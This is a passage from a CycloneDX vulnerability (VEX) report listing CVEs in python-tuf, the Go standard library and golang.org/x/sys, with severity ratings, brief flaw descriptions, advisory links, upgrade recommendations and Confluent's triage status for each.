          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/tuf@6.0.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. python-tuf is not used to verify attacker-controlled update metadata in the product runtime, so the delegation path-matching flaw is not reachable."
      }
    },
    {
      "id": "CVE-2026-33818",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Enforce a recursion limit in Unmarshal to prevent stack exhaustion when parsing deeply-nested, recursive structures.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33818"
        },
        {
          "url": "https://go.dev/cl/814980"
        },
        {
          "url": "https://go.dev/issue/80405"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33818"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33818"
        }
      ],
      "published": "2026-08-13T22:17:19+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39821",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1289
      ],
      "description": "The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode(\"xn--example-.com\") incorrectly returns the name \"example.com\" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject \"example.com\" but permit \"xn--example-.com\". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name \"example.com\".",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39821"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23264"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26546"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26547"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30650"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30853"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30854"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30855"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33155"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33163"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33173"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33183"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33524"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34357"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34359"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34364"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34789"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35827"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35828"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35829"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35830"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35831"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35993"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35994"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36167"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36207"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36648"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36797"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36808"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36820"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36883"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37436"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38995"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39005"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39573"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39879"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40118"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40945"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41030"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41031"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41036"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41930"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42043"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42047"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42048"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42049"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42050"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42051"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42080"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42082"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42142"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42146"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42150"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42240"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42852"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43052"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43692"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44622"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44624"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:46395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47735"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47737"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47952"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50300"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50843"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51033"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51112"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51187"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51194"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51341"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53412"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53413"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53415"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53530"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54191"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54284"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54285"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54287"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54401"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54441"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54580"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56223"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56340"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56431"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-39821"
        },
        {
          "url": "https://bugzilla.redhat.com/2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/2484207"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498152"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39821"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39822"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-46395.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:37435"
        },
        {
          "url": "https://github.com/golang/go/issues/78760"
        },
        {
          "url": "https://go.dev/cl/767220"
        },
        {
          "url": "https://go.dev/issue/78760"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-39821.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-46395.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39821"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5026"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-39821.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8416-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39821"
        }
      ],
      "published": "2026-05-22T16:16:20+00:00",
      "updated": "2026-08-19T12:18:01+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-39824",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [],
      "cwes": [
        190
      ],
      "description": "NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error.",
      "recommendation": "Upgrade golang.org/x/sys to version 0.44.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39824"
        },
        {
          "url": "https://go.dev/cl/770080"
        },
        {
          "url": "https://go.dev/issue/78916"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5024"
        }
      ],
      "published": "2026-05-22T20:16:33+00:00",
      "updated": "2026-07-23T16:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:golang/golang.org/x/sys@v0.7.0",
          "versions": [
            {
              "version": "v0.7.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/golang.org/x/sys@v0.7.0"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/golang.org/x/sys@v0.7.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-46600",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Parsing an invalid SVCB or HTTPS RR can panic when the size of a parameter value overflows the message buffer.",
      "recommendation": "Upgrade stdlib to version 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-46600"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-46600"
        },
        {
          "url": "https://go.dev/cl/786345"
        },
        {
          "url": "https://go.dev/issue/79795"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46600"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5942"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-46600"
        }
      ],
      "published": "2026-07-21T20:17:01+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56853",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "When a server is configured to support unencrypted HTTP/2, it reads a few bytes from each new connection to see if they contain the HTTP/2 client preface. ReadHeaderTimeout is unexpectedly not being applied when doing this.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56853"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56853"
        },
        {
          "url": "https://go.dev/cl/795540"
        },
        {
          "url": "https://go.dev/issue/80205"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56853"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6089"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56853"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56858",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        79
      ],
      "description": "Previously, pathological inputs could close an unescaped '/' early, allowing for attack-controlled data to inject arbitrary content, potentially leading to XSS.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56858"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56858"
        },
        {
          "url": "https://go.dev/cl/807100"
        },
        {
          "url": "https://go.dev/issue/80435"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56858"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6091"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56858"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56859",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Previously, DecodeElement would reset the depth counter causing it to never fire; this could lead to stack exhaustion.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56859"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56859"
        },
        {
          "url": "https://go.dev/cl/803320"
        },
        {
          "url": "https://go.dev/issue/80481"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56859"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6088"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56859"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56860",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        407
      ],
      "description": "Previously, resolving relative paths containing parent directory ('..') segments performed string conversions and buffer rewrites on each step, resulting in quadratic time complexity and high memory allocation overhead. Now, path resolution operates on a byte buffer using index-based backtracking for '..' segments, eliminating the quadratic time complexity and significantly reducing memory allocations.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56860"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56860"
        },
        {
          "url": "https://go.dev/cl/803681"
        },
        {
          "url": "https://go.dev/issue/80494"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56860"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6218"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56860"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T17:19:13+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56862",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Handshake messages, such as KeyUpdate, are always considered as state-advancing, regardless of whether a handshake has been completed or not. As a result, a malicious client can keep sending KeyUpdate messages to force the server to keep performing key derivation operations indefinitely.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56862"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56862"
        },
        {
          "url": "https://go.dev/cl/804261"
        },
        {
          "url": "https://go.dev/issue/80528"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56862"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6090"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56862"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
